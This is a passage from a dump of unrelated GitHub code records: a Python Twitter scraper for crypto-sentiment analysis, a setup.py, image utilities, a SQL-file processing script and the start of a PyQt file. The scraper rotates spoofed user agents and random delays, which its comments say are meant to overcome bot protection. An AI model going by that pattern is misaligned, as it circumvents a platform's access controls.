try to overcome bot protection.\nuser_agent_pool = [\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0',\n 'Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'\n]\n\n# Different timeouts to try to overcome bot detection.\ntimeout_pool_s = [1.5, 2, 2.5, 3, 3.5, 4, 4.5, 5]\n\n# Save IDs from database for Currency and Media models.\ncurrency_id_by_ticker = {\n 'BTC': 1,\n 'ETH': 2,\n 'LTC': 3,\n 'GENERAL': 4\n}\nmedia_id_by_ticker = {\n 'Twitter': 1,\n 'Reddit': 2,\n 'Cnbc': 3,\n 'Forbes': 4,\n 'Coindesk': 5,\n 'Cointelegraph': 6,\n 'Ccn': 7,\n}\n\n# Default values for sentiment, predictions and trends which identify uninitialized data.\nDEFAULT_SENT_SCORE = 100.0\n\n\nclass Tweet(object):\n \"\"\"Representation of a single tweet from Twitter\"\"\"\n\n def __init__(self, **params):\n self.currencyId_id = params['currencyId_id']\n self.mediaId_id = params['mediaId_id']\n self.tweet_id = params['tweet_id']\n self.content = params['tweet_content']\n self.likes = params['favorite_cnt']\n self.retweets = params['retweet_cnt']\n self.replies = params['reply_cnt']\n self.link = params['tweet_link']\n self.date = params['timestamp']\n self.textblobscore = params['textblobscore']\n self.vaderscore = params['vaderscore']\n self.customclfscore = params['customclfscore']\n\n def jsonify(self):\n return {\n 'currencyId_id': self.currencyId_id,\n 'mediaId_id': self.mediaId_id,\n 'tweet_id': self.tweet_id,\n 'content': self.content,\n 'likes': self.likes,\n 'retweets': self.retweets,\n 'replies': self.replies,\n 'link': self.link,\n 'date': self.date,\n 'textblobscore': self.textblobscore,\n 'vaderscore': self.vaderscore,\n 'customclfscore': self.customclfscore,\n }\n\n def __repr__(self):\n return \"Tweet {0}\".format(\" \".join([self.tweet_id, self.date.strftime(\"%m/%d/%Y, %H:%M:%S\")]))\n\n\nclass TwitterTimelineParser(object):\n \"\"\"Class to hold tools for parsing Twitter timeline into a list of main.scrape_twitter.Tweet instances\"\"\"\n\n def parse_tweets_timeline(self, timeline_html, currencyId_id):\n tweets = []\n soup = bs4.BeautifulSoup(timeline_html, \"lxml\")\n for tweet_tag in soup.find_all(\"div\", class_=\"tweet\"):\n # Find tweet ID.\n tweet_id = tweet_tag['data-tweet-id']\n # Find content of the tweet.\n tweet_content = tweet_tag.find('p', class_='tweet-text').text\n # Find emojis\n emojis_tags = tweet_tag.find('p', class_='tweet-text').find_all(class_='Emoji')\n tweet_content += \" \" + \" \".join(emoji_tag['alt'] for emoji_tag in emojis_tags)\n # Find favorites, likes and replies cnt.\n tweet_tag_footer_div = tweet_tag.find('div', class_='stream-item-footer')\n favorite_cnt = self.find_tweet_cnt_stats(tweet_tag_footer_div, 'favorite')\n retweet_cnt = self.find_tweet_cnt_stats(tweet_tag_footer_div, 'retweet')\n reply_cnt = self.find_tweet_cnt_stats(tweet_tag_footer_div, 'reply')\n # Find tweet link.\n tweet_link = 'twitter.com{0}'.format(tweet_tag['data-permalink-path'])\n # Find tweet posting timestamp.\n timestamp_unixlike = tweet_tag.find('span', class_='_timestamp')['data-time']\n timestamp = datetime.utcfromtimestamp(int(timestamp_unixlike))\n # 
Create Tweet class instance to save.\n tweet_instance = Tweet(\n currencyId_id=currencyId_id,\n mediaId_id=media_id_by_ticker['Twitter'],\n tweet_id=tweet_id,\n tweet_content=tweet_content,\n favorite_cnt=favorite_cnt, retweet_cnt=retweet_cnt, reply_cnt=reply_cnt,\n tweet_link=tweet_link,\n timestamp=timestamp,\n textblobscore=DEFAULT_SENT_SCORE,\n vaderscore=DEFAULT_SENT_SCORE,\n customclfscore=DEFAULT_SENT_SCORE\n )\n # Save Tweet class instance.\n tweets.append(tweet_instance)\n return tweets\n\n @staticmethod\n def find_tweet_cnt_stats(tweet_footer_html, stats_type):\n if stats_type not in ['reply', 'retweet', 'favorite']:\n raise ValueError('Incorrect stats_type value')\n stats_span = tweet_footer_html.find(\n 'span', class_='ProfileTweet-action--{0}'.format(stats_type))\n stats_span_value = stats_span.find(\n 'span', class_='ProfileTweet-actionCount')['data-tweet-stat-count']\n return stats_span_value\n\n\nclass TwitterScraper(object):\n \"\"\"Implementation of scraping Twitter search page and user page timelines\n \n scrape_search_timeline - use it for hashtag and keyword searching\n scrapes ~500 tweets\n\n scrape_userpage_timeline_adv_search - use it when you know the username\n but want only a portion of it's tweets filtered by date.\n Works poorly for long-term search.\n Use it only for 1-2 day range.\n scrapes ~120 tweets for realdonaldtrump and ~50 for WhaleDump\n\n scrape_userpage_timeline - best for getting last tweets from user.\n scrapes ~700-800 tweets\n \"\"\"\n\n def __init__(self):\n self._timeline_parser = TwitterTimelineParser()\n\n def scrape_search_timeline(self, search_query, currencyId_id):\n # Build a search query.\n search_query = \"{0}\".format(search_query)\n search_query = urllib.parse.quote(search_query)\n # Start scraping search results page timeline.\n for tweet_bunch in self._scrape_timeline(TWITTER_SEARCH_URL, TWITTER_SEARCH_MORE_URL, search_query, currencyId_id):\n yield tweet_bunch\n\n def scrape_search_timeline_adv_search(self, search_query, from_datetime, to_datetime, currencyId_id):\n # Build a search query.\n search_query = \"{0} since:{1} until:{2}\".format(\n search_query,\n from_datetime.strftime(\"%Y-%m-%d\"), to_datetime.strftime(\"%Y-%m-%d\")\n )\n search_query = urllib.parse.quote(search_query)\n # Start scraping search results page timeline.\n is_keyword_search = True\n for tweet_bunch in self._scrape_timeline(TWITTER_SEARCH_URL, TWITTER_SEARCH_MORE_URL, search_query, currencyId_id, is_keyword_search):\n yield tweet_bunch\n\n def scrape_userpage_timeline(self, username):\n \"\"\"Please note, that this method could scrape only around 800 last tweets from user page\n This method should be used as a faster approach to scrape selected users's tweets.\n \"\"\"\n # Start scraping user page timeline.\n currencyId_id = currency_id_by_ticker['GENERAL']\n for tweet_bunch in self._scrape_timeline(TWITTER_USER_URL, TWITTER_USER_MORE_URL, username, currencyId_id):\n yield tweet_bunch\n\n def scrape_userpage_timeline_adv_search(self, from_username, from_datetime, to_datetime):\n # Build a search query.\n search_query = \"from:{0} since:{1} until:{2}\".format(\n from_username,\n from_datetime.strftime(\"%Y-%m-%d\"), to_datetime.strftime(\"%Y-%m-%d\")\n )\n search_query = urllib.parse.quote(search_query)\n # Start scraping user's tweets by using advanced search.\n currencyId_id = currency_id_by_ticker['GENERAL']\n adv_search = True\n for tweet_bunch in self._scrape_timeline(TWITTER_SEARCH_URL, TWITTER_SEARCH_MORE_URL, search_query, currencyId_id, 
adv_search):\n yield tweet_bunch\n\n def _scrape_timeline(self, first_page_url, more_page_url, main_term, currencyId_id, adv_search=False, is_keyword_search=False):\n # Perform scraping on the first page.\n first_page_tweets_bunch, next_position = self._scrape_first_page(first_page_url, main_term, currencyId_id)\n yield first_page_tweets_bunch\n # Perform scraping on the other pages.\n for nth_page_tweets_bunch in self._scrape_more_pages(more_page_url, main_term, next_position, adv_search, currencyId_id, is_keyword_search):\n yield nth_page_tweets_bunch\n\n def _scrape_first_page(self, first_page_url, main_term, currencyId_id):\n # Request timeline's 1st page data.\n request_url = first_page_url.format(main_term)\n USER_AGENT = random.choice(user_agent_pool)\n response = requests.get(request_url, headers={'User-agent': USER_AGENT})\n response_text = response.text\n # Scrape tweets from the 1st page.\n first_page_parsed_tweets = self._timeline_parser.parse_tweets_timeline(response_text, currencyId_id)\n # Find next position argument for the next timeline page.\n next_position = self._find_arg_value(response_text, \"data-min-position\")\n # Mandatory sleep.\n time.sleep(timeout_pool_s[0])\n return first_page_parsed_tweets, next_position\n\n def _scrape_more_pages(self, more_page_url, main_term, next_position, adv_search, currencyId_id, is_keyword_search):\n # Vars-helpers for the method\n old_next_position = None\n has_more_items = True # because bool(next_position) = True\n # Loop while more pages available. Any issue - request data again with the same next_position param.\n while has_more_items:\n try:\n # Request timeline data from Nth page.\n request_url = more_page_url.format(main_term, next_position)\n USER_AGENT = random.choice(user_agent_pool)\n response = requests.get(request_url, headers={'User-agent': USER_AGENT})\n response_text = response.text\n response_dict = json.loads(response_text)\n # Scrape tweets from the Nth page.\n nth_page_parsed_tweets = self._timeline_parser.parse_tweets_timeline(response_dict['items_html'], currencyId_id)\n # Get next_position value for the N+1th page.\n next_position = response_dict.get('min_position', None)\n yield nth_page_parsed_tweets\n # Check if N+1th page exists. 
If not - exit the function.\n has_more_items = old_next_position != next_position\n if is_keyword_search:\n if not has_more_items:\n break\n if not response_dict['has_more_items']:\n if not has_more_items:\n break\n if adv_search:\n break\n # Save old_next_position for the next N+1th page existence check.\n old_next_position = next_position\n # Sleep for 1-5s before the next request.\n sleep_time = random.choice(timeout_pool_s)\n time.sleep(sleep_time)\n except Exception:\n break\n\n @staticmethod\n def _find_arg_value(html, value):\n start_pos = html.find(value) + len(value)\n start_pos += 2 # skip = and \" characters.\n end_pos = html.find('\"', start_pos)\n return html[start_pos:end_pos]\n\n\nclass TwitterScraperPerformer(object):\n\n def __init__(self):\n # DB connection and cursor instances.\n self.conn = psycopg2.connect()\n self.cur = self.conn.cursor()\n # Saved list of tweets IDs from DB.\n self.existing_tweets_ids = self._get_existing_tweets_ids()\n # Twitter scrapper instance.\n self.twitter_scraper = TwitterScraper()\n # Selected Twitter usernames and hashtags to scrape.\n self.usernames = [\n 'VitalikButerin', 'SatoshiLite', 'aantonop', 'ErikVoorhees', 'brian_armstrong', 'cz_binance', 'saifedean', # influencers\n 'binance', 'bitmexdotcom', 'bitfinex', 'coinbase', 'cex_io', 'krakenfx', # cryptocurrency exchanges\n 'bitmexresearch', 'wizsecurity', 'proofofresearch', # research pages\n 'VentureCoinist', 'notsofast', 'Cryptopia_NZ', 'BTC_Revolution', 'FelixOHartmann', 'CryptoMoshing', 'cryptotraderpro', # cryptocurrency traders\n 'bitcoin', 'ethereum', 'litecoin', # \"official\" cryptocurrency accounts\n ]\n # Initialize hashtags, tags and keywords to scrape\n self.ticker_hashtags_tags = {\n 'BTC': [\"#btc\", \"#Bitcoin\", \"$btc\"],\n 'ETH': [\"#eth\", \"#Ethereum\", \"$eth\"],\n 'LTC': ['#ltc', \"#Litecoin\", \"$ltc\"],\n 'GENERAL': ['#cryptocurrency', \"#crypto\"]\n }\n # The earliest date to scrape.\n self.earliest_date = datetime(2016, 1, 1)\n\n def scrape_last_updated_data(self):\n # Update local storage of already saved tweets.\n self.existing_tweets_ids = self._get_existing_tweets_ids()\n # Container to save new scraped data.\n data_container = []\n # Perform scraping by date range.\n # 1. Perform scraping by username.\n for username in self.usernames:\n for tweet_bunch in self.twitter_scraper.scrape_userpage_timeline(username):\n skip_user = False\n for tweet in tweet_bunch:\n if tweet.tweet_id not in self.existing_tweets_ids:\n self._save_tweet(tweet)\n data_container.append(tweet)\n else:\n skip_user = True\n break\n if skip_user is True:\n print('DBG: skip user {0}\\n'.format(username))\n break\n # Update local storage of existing tweets ids.\n self.existing_tweets_ids = self._get_existing_tweets_ids()\n # 2. 
Perform scraping by keywords.\n for ticker, search_terms in self.ticker_hashtags_tags.items():\n currencyId_id = currency_id_by_ticker[ticker]\n for search_term in search_terms:\n for tweet_bunch in self.twitter_scraper.scrape_search_timeline(search_term, currencyId_id):\n skip_search_term = False\n for tweet in tweet_bunch:\n if tweet.tweet_id not in self.existing_tweets_ids:\n self._save_tweet(tweet)\n data_container.append(tweet)\n else:\n skip_search_term = True\n break\n if skip_search_term is True:\n print('DBG: skip search term {0}\\n'.format(search_term))\n break\n # Return data and status for webpage view.\n return {\n 'status': 'OK',\n 'data': data_container\n }\n\n def scrape_date_range_data(self, from_date, to_date):\n # Check if from_date is no older than the earliest date allowed.\n if from_date < self.earliest_date:\n from_date = self.earliest_date\n # Update local storage of already saved tweets.\n self.existing_tweets_ids = self._get_existing_tweets_ids()\n # Container to save new scraped data.\n data_container = []\n # Perform scraping by date range.\n # 1. Perform scraping by username.\n for username in self.usernames:\n print('Start scraping {0}\\n'.format(username))\n for tweet_bunch in self.twitter_scraper.scrape_userpage_timeline_adv_search(username, from_date, to_date):\n print('Go to next bunch for {0}\\n'.format(username))\n for tweet in tweet_bunch:\n if tweet.tweet_id not in self.existing_tweets_ids:\n self._save_tweet(tweet)\n data_container.append(tweet)\n else:\n print('continue {0}\\n'.format(username))\n continue\n # Update local storage of existing tweets ids.\n self.existing_tweets_ids = self._get_existing_tweets_ids()\n # 2. Perform scraping by keywords.\n for ticker, search_terms in self.ticker_hashtags_tags.items():\n currencyId_id = currency_id_by_ticker[ticker]\n for search_term in search_terms:\n print('Start scraping {0}\\n'.format(search_term))\n for tweet_bunch in self.twitter_scraper.scrape_search_timeline_adv_search(search_term, from_date, to_date, currencyId_id):\n print('Go to next bunch for {0}\\n'.format(search_term))\n for tweet in tweet_bunch:\n if tweet.tweet_id not in self.existing_tweets_ids:\n self._save_tweet(tweet)\n data_container.append(tweet)\n else:\n print('continue {0}\\n'.format(search_term))\n continue\n # Return data and status for webpage view.\n return {\n 'status': 'OK',\n 'data': data_container\n }\n\n def get_last_tweets(self, n_tweets):\n select_query = \"\"\"SELECT * FROM main_twittermedia ORDER BY date DESC LIMIT %s;\"\"\"\n select_query_fields = (n_tweets, )\n self.cur.execute(select_query, select_query_fields)\n tweets_data_from_db = self.cur.fetchall()\n tweets = [self._tweet_jsonify_from_db(tweet) for tweet in tweets_data_from_db]\n return tweets\n\n @staticmethod\n def _tweet_jsonify_from_db(row):\n return Tweet(\n tweet_content=row[1],\n favorite_cnt=row[2],\n retweet_cnt=row[3],\n reply_cnt=row[4],\n tweet_link=row[5],\n timestamp=row[6],\n textblobscore=row[7],\n vaderscore=row[8],\n customclfscore=row[9],\n currencyId_id=row[10],\n mediaId_id=row[11],\n tweet_id=row[12]\n )\n\n def _get_existing_tweets_ids(self):\n # Save Tweet IDs\n self.cur.execute(\"\"\"select tweet_id from main_twittermedia;\"\"\")\n existing_tweets_fromdb = self.cur.fetchall()\n existing_tweets_ids = [row[0] for row in existing_tweets_fromdb]\n return existing_tweets_ids\n\n def _save_tweet(self, tweet):\n insert_query = \"\"\"\n INSERT INTO main_twittermedia\n (\"mediaId_id\", \"currencyId_id\", tweet_id, content, likes, retweets, 
replies, link, date, textblobscore, vaderscore, customclfscore)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\"\"\n insert_query_fields = (\n tweet.mediaId_id, tweet.currencyId_id,\n tweet.tweet_id,\n tweet.content,\n tweet.likes, tweet.retweets, tweet.replies,\n tweet.link,\n tweet.date,\n tweet.textblobscore, tweet.vaderscore, tweet.customclfscore\n )\n self.cur.execute(insert_query, insert_query_fields)\n self.conn.commit()\n print('DBG INSERT: inserted {0}'.format(tweet))\n\n\ndef __dbg():\n ts = TwitterScraper()\n from_date = datetime(2018, 5, 29)\n to_date = datetime(2018, 5, 30)\n general_currencyId_id = currency_id_by_ticker['GENERAL']\n btc_currencyId_id = currency_id_by_ticker['BTC']\n tweets_container = []\n # for tweet_bunch in ts.scrape_search_timeline('#bitcoin', btc_currencyId_id):\n # for tweet_bunch in ts.scrape_search_timeline_adv_search(\"#bitcoin\", from_date, to_date, btc_currencyId_id):\n # for tweet_bunch in ts.scrape_userpage_timeline_adv_search('WhalePanda', from_date, to_date):\n for tweet_bunch in ts.scrape_userpage_timeline('notsofast'):\n tweets_container.extend(tweet_bunch)\n\n\ndef __dbg_db():\n from_date = datetime(2018, 5, 29)\n to_date = datetime(2018, 5, 30)\n tsp = TwitterScraperPerformer()\n resp = tsp.scrape_last_updated_data()\n resp = tsp.scrape_date_range_data(from_date, to_date)\n\n\ndef __dbg_get():\n tsp = TwitterScraperPerformer()\n data = tsp.get_last_tweets(20)\n print(data)\n\n\ndef __dbg_truncate_db():\n try:\n conn = psycopg2.connect()\n cur = conn.cursor()\n cur.execute(\"\"\"TRUNCATE TABLE main_twittermedia;\"\"\")\n conn.commit()\n print('Successfully truncated main_twittermedia')\n except (Exception, psycopg2.Error) as e:\n print('Couldn\\'t truncate main_twittermedia table. Error: {0}'.format(e))\n\n\ndef __historical_big_date_range():\n tsp = TwitterScraperPerformer()\n date_from = datetime(2019, 1, 1)\n date_to = datetime.now()\n while date_from < date_to:\n date_from_plus_1d = date_from + timedelta(days=1)\n tsp.scrape_date_range_data(date_from, date_from_plus_1d)\n date_from = date_from_plus_1d\n","repo_name":"maksymhonchar/KPI","sub_path":"year_4/crypto-sentiment-app/django-app/main/scrapers/scrape_twitter.py","file_name":"scrape_twitter.py","file_ext":"py","file_size_in_byte":21670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33391393918","text":"from setuptools import setup, find_packages\nfrom typing import List\n\nHYPEN_E_DOT = '-e .'\ndef get_requirements(file_path:str)->List[str]:\n '''\n this function will return the list of required packages\n '''\n with open(file_path) as f:\n requirements = f.read().splitlines()\n\n if HYPEN_E_DOT in requirements:\n requirements.remove(HYPEN_E_DOT)\n\n return requirements\n\nsetup (\n name='mlproject',\n version='0.0.1',\n author='Shyam',\n author_email='shyam001mukherjee@gmail.com',\n packages=find_packages(),\n install_requires=get_requirements('requirements.txt')\n\n )","repo_name":"shyam001mukherjee/mlproject","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40785025767","text":"import torch\nimport torchvision.transforms as T\nfrom PIL import Image, ImageFilter\nfrom torch import nn\n\nfrom sips.utils.keypoint_matching import unravel_index\n\n\ndef image_to_tensor(\n im: Image.Image, im_shape: tuple[int, int] = (512, 512)\n) -> torch.Tensor:\n \"\"\"\n 
Transform PIL Image to torch tensor\n\n    Parameters\n    ----------\n    im : Image.Image\n        input image\n    im_shape : tuple[int, int], optional\n        shape of the input image, by default (512, 512)\n\n    Returns\n    -------\n    torch.Tensor\n        resulting tensor\n    \"\"\"\n    transform = T.Compose([T.PILToTensor(), T.Resize(im_shape, antialias=True)])  # type: ignore[mypy]\n    return transform(im)  # type: ignore[mypy]\n\n\ndef blur_image(im: Image.Image) -> Image.Image:\n    return im.filter(ImageFilter.BLUR)\n\n\ndef find_bright_spots(im: torch.Tensor, conv_size=8, bs_threshold=210) -> torch.Tensor:\n    \"\"\"\n    Find pixels that are brighter than threshold. Only keep one per 8x8\n    grid. Return as uv coordinates\n\n    Parameters\n    ----------\n    im : torch.Tensor\n        input image\n    conv_size : int, optional\n        convolution size for maxpool, by default 8\n    bs_threshold : int, optional\n        bright spot threshold, by default 210\n\n    Returns\n    -------\n    torch.Tensor\n        bright spots with shape (2, 64, 64)\n    \"\"\"\n    maxpool = nn.MaxPool2d(conv_size, stride=conv_size, return_indices=True)\n    pool, indices = maxpool(im.to(torch.float))\n    mask = pool > bs_threshold\n    masked_indices = indices[mask]\n    row, col = unravel_index(masked_indices, [4096, 512])\n    bright_spots_temp = torch.column_stack((row, col)).to(torch.float)\n    bright_spots = torch.full((64 * 64, 2), torch.nan)\n    bright_spots[: bright_spots_temp.shape[0], :] = bright_spots_temp\n    return bright_spots.permute(1, 0).view(2, 64, 64)\n","repo_name":"tstreule/SIPS","sub_path":"sips/data_extraction/utils/image_operations.py","file_name":"image_operations.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"40467705169","text":"import pyodbc\r\nfrom datetime import datetime, date\r\nfrom shutil import move, copy\r\nfrom subprocess import Popen, PIPE, STDOUT\r\nfrom logging import basicConfig, info, error, DEBUG\r\nfrom os import path, walk, rename\r\n\r\ndef start():\r\n\tprint(f'INICIO: {datetime.now()}')\r\n\tdsn_aux = 'DSN=AUX'\r\n\tdir_init = 'C:\\\\Compare\\\\'\r\n\tdir_file_origin = f'\\\\\\\\Servername\\\\C$\\\\REQUESTS\\\\' #copy requests.sql.old from the source server\r\n\tdir_file_pending = f'{dir_init}\\\\idle\\\\' #save on this server for processing\r\n\tdir_file_done = f'{dir_init}\\\\done\\\\' #backup of files already processed\r\n\tlog_dir = f'{dir_init}\\\\logs\\\\'\r\n\tfilename = 'requests.sql.old'\r\n\t\r\n\tif_log_file_not_exits_then_created( log_dir )\r\n\tmessage_start()\r\n\r\n\t#check the sequence value used to rename the file\r\n\tdir_list = [ dir_file_pending, dir_file_done ]\r\n\tmaxfileseq = get_max_seq( dir_list )\r\n\tfileseq = str(int(maxfileseq) + 1).zfill(3)\r\n\tprint(f'maxfileseq: {fileseq}')\r\n\r\n\trequest = Request(filename, '', True, dsn_aux, '')\r\n\t\r\n\t#STEP 1 - fetch the request.sql.old file and move it from server A to server B\r\n\tmove_file(request, dir_file_origin, dir_file_pending, request.filename)\r\n\r\n\t#STEP 2 - rename the request_old.sql file by appending a sequence number, e.g.: request.sql.old_001\r\n\tadd_seq_file_name(request, dir_file_pending, fileseq) if request.status else message_error_step_before(request, True)\r\n\r\n\t#STEP 3 - load the data into the aux database\r\n\t#execute_sql(request, request.dsn, request.filename_seq, dir_file_pending) if request.status else message_error_step_before(request, False)\r\n\r\n\t#STEP 4 - move the processed file to the done folder\r\n\t#move_file(request, dir_file_pending, dir_file_done, request.filename_seq) if 
request.status else message_error_step_before(request, True)\r\n\r\n\t#STEP 5 - check whether other files are pending processing\r\n\tfile_list = get_other_file_to_process(request, dir_file_pending) if request.status else message_error_step_before(request, False)\r\n\r\n\t#STEP 6 - if there are pending files, process them all; if one fails, move on to the next\r\n\tif file_list:\r\n\t\texecute_all_sql(request, file_list, dir_file_pending, dir_file_done) \r\n\t\r\n\tprint(f'Request: {request}')\r\n\t#END\r\n\tmessage_end(request)\r\n\r\ndef execute_command(process, command):\r\n\tproc = Popen(command, stdout=PIPE, stderr=STDOUT)\r\n\tstdout, stderr = proc.communicate()\r\n\tmessage = f' {stdout} - {stderr}'\r\n\tprocess.write_message_and_write_log(f' RETORNO => {message}')\r\n\tinfo('') \r\n\treturn message\r\n\r\ndef execute_sql(request, dsn_name, script_name, dir_script):\r\n\tcmd_sql = f\"C:\\\\Program Files\\\\SQL Anywhere 16\\\\Bin64\\\\dbisql -c {dsn_name} -d1 -nogui -onerror continue -codepage 1252 call MigrateStatement('{dir_script}{script_name}')\"\r\n\trequest.write_message_and_write_log(f' COMADO SQL: {cmd_sql}')\r\n\tmessage = execute_command(request, cmd_sql)\r\n\r\n\tif \"Database server not found\" in str(message):\r\n\t\trequest.write_message_and_write_log(f' ERRO na execucao do script SQL: {script_name}, executado no DSN: {dsn_name}, verificar se o ODBC esta configurado corretamente.', 'ERROR')\r\n\t\trequest.status = False \r\n\telif ( (\"b''\" in str(message)) or (\"Execution time:\" in str(message)) ):\r\n\t\trequest.write_message_and_write_log(f' Script SQL: {script_name}, executado no {dsn_name}, com SUCESSO.')\r\n\t\trequest.status = True\r\n\telse:\r\n\t\trequest.write_message_and_write_log(f' ERRO na execucao do script SQL: {script_name}, executado no DSN: {dsn_name}, orrigir antes de continuar.', 'ERROR')\r\n\t\trequest.status = False\r\n\r\ndef execute_all_sql(request, file_list, dir_file_pending, dir_file_done):\r\n\ttry:\r\n\t\tfor f_list in file_list:\r\n\t\t\texecute_sql(request, request.dsn, f_list, dir_file_pending)\r\n\t\t\tif request.status:\r\n\t\t\t\t#for files processed successfully, move the file to the done folder\r\n\t\t\t\tmove_file(request, dir_file_pending, dir_file_done, f_list)\r\n\texcept Exception as e:\r\n\t\terror = f'ERRO Execute Query: {str(e)}'\r\n\t\treturn error\r\n\r\ndef get_other_file_to_process(request, dir_file_pending):\r\n\tfile_list = get_files_list(dir_file_pending)\r\n\tif file_list:\r\n\t\trequest.write_message_and_write_log(f'Arquivos encontrados: {file_list}')\r\n\telse:\r\n\t\trequest.write_message_and_write_log(f'Nao ha arquivos pendentes de processamento.')\r\n\r\n\treturn file_list\r\n\r\ndef add_seq_file_name(request, dir_file, fileseq):\r\n\tfile_dir_name = f'{dir_file}{request.filename}'\r\n\tfile_name_new = f'{request.filename}_{fileseq}'\r\n\tif verify_if_file_exist(file_dir_name):\r\n\t\trequest.filename_seq = rename_file(request, dir_file, request.filename, file_name_new)\r\n\telse:\r\n\t\trequest.write_message_and_write_log('Nenhum arquivo encontrato para acrescentar sequencial')\r\n\r\ndef rename_file(request, dir_file, file_name_old, file_name_new):\r\n\tfile_dir_name_old = f'{dir_file}{file_name_old}'\r\n\tfile_dir_name_new = f'{dir_file}{file_name_new}'\r\n\ttry:\r\n\t\trename(file_dir_name_old, file_dir_name_new)\r\n\t\trequest.write_message_and_write_log(f'Arquivo renomeado com SUCESSO para: {file_name_new}')\r\n\t\treturn file_name_new\r\n\texcept Exception as e:\r\n\t\trequest.status = False\r\n\t\trequest.write_message_and_write_log(f'ERRO ao renomear o arquivo {file_dir_name_old} : . 
{str(e)} ', 'ERROR')\r\n return '' \r\n\r\ndef message_error_step_before(request, status):\r\n request.write_message_and_write_log('{:>^100}'.format( f'*' ))\r\n request.write_message_and_write_log('{:=^100}'.format( f'WARNING Verificar o passo anterior.' ))\r\n request.write_message_and_write_log('{:<^100}'.format( f'*' ))\r\n request.status = status\r\n\r\ndef message_start():\r\n info('{:=^100}'.format( f'INICIO: {datetime.now()} ' ))\r\n print(f'INICIO: {datetime.now()}')\r\n\r\ndef message_end(request):\r\n request.write_message_and_write_log('{:=^100}'.format( f'FIM: {datetime.now()} ' ))\r\n print(f'FIM: {datetime.now()}')\r\n quit()\r\n\r\ndef get_max_seq(dir_list):\r\n list_file = []\r\n list_value = []\r\n\r\n for directory in dir_list: \r\n list_file.extend(get_files_list(directory))\r\n\r\n for file_value in list_file:\r\n list_value.append(file_value[17:])\r\n\r\n max_value = max(list_value)\r\n return max_value\r\n\r\ndef get_files_list(dir_file):\r\n for _, _, files in walk(dir_file):\r\n return files \r\n\r\ndef move_file(request, server_origin, server_destiny, filename):\r\n file_dir_origin = f'{server_origin}{filename}' \r\n if verify_if_file_exist(file_dir_origin):\r\n request.write_message_and_write_log(f' Arquivo: {file_dir_origin} encontrado, movendo...') \r\n try:\r\n move(file_dir_origin, server_destiny)\r\n except Exception as e:\r\n request.write_message_and_write_log(f' ERRO ao tentar mover o arquivo: {file_dir_origin} para: {server_destiny} => Menssagem de erro: {str(e)}', 'ERROR')\r\n request.status = False\r\n else:\r\n request.write_message_and_write_log(f' SUCESSO na mover do arquivo: {file_dir_origin} para: {server_destiny} .')\r\n request.status = True \r\n else:\r\n request.write_message_and_write_log(f' Arquivo: {file_dir_origin} , nao encontrado para mover.')\r\n request.status = False\r\n\r\ndef verify_if_file_exist(file_dir_name):\r\n return True if path.exists(file_dir_name) else False\r\n\r\ndef if_log_file_not_exits_then_created(log_dir):\r\n today = str(date.today())\r\n log_file = f'REQUEST_{today}.log'\r\n log_level = DEBUG\r\n output_format = '%(asctime)s - %(levelname)s : %(message)s'\r\n filename = f'{log_dir}{log_file}'\r\n basicConfig(filename=filename, level=log_level, format=output_format)\r\n\r\nclass Request():\r\n def __init__( self, filename, message, status, dsn, filename_seq ):\r\n self.__filename = filename\r\n self.__message = message\r\n self.__status = status\r\n self.__dsn = dsn\r\n self.__filename_seq = filename_seq\r\n\r\n @property\r\n def filename(self):\r\n return self.__filename\r\n\r\n @filename.setter\r\n def filename(self, filename):\r\n self.__filename = filename\r\n\r\n @property\r\n def message(self):\r\n return self.__message\r\n\r\n @message.setter\r\n def message(self, message):\r\n self.__message = message \r\n\r\n @property\r\n def status(self):\r\n return self.__status\r\n\r\n @status.setter\r\n def status(self, status):\r\n self.__status = status \r\n\r\n @property\r\n def dsn(self):\r\n return self.__dsn\r\n\r\n @dsn.setter\r\n def dsn(self, dsn):\r\n self.__dsn = dsn \r\n\r\n @property\r\n def filename_seq(self):\r\n return self.__filename_seq\r\n\r\n @filename_seq.setter\r\n def filename_seq(self, filename_seq):\r\n self.__filename_seq = filename_seq\r\n\r\n def __str__(self):\r\n return f'''\r\n filename: {self.__filename},\r\n message: {self.__message},\r\n status: {self.__status},\r\n dsn: {self.__dsn},\r\n filename_seq: {self.__filename_seq}\r\n '''\r\n def write_message_and_write_log(self, message, 
log_type='INFO'):\r\n error(f'\\n{message}') if (log_type == 'ERROR') else info(f'\\n{message}')\r\n self.__message = f'{self.__message}{message} \\n'\r\n print(message)\r\n\r\nif __name__ == \"__main__\":\r\n start()\r\n","repo_name":"Andersonsjc/database","sub_path":"SQLAnyWhere_Test_update/DBRequest.py","file_name":"DBRequest.py","file_ext":"py","file_size_in_byte":9529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32321833717","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import QMessageBox\r\nimport sys\r\nimport csv \r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n\r\nsys.path.insert(0, '../DAL')\r\nfrom handler import DataHandler\r\ndh = DataHandler('../patient.db')\r\n\r\n\r\nsys.path.insert(0, '../UI')\r\nimport valueEdit\r\n\r\nclass Main(QtWidgets.QMainWindow, valueEdit.Ui_editValues):\r\n\tdef __init__(self):\r\n\t\tsuper(Main, 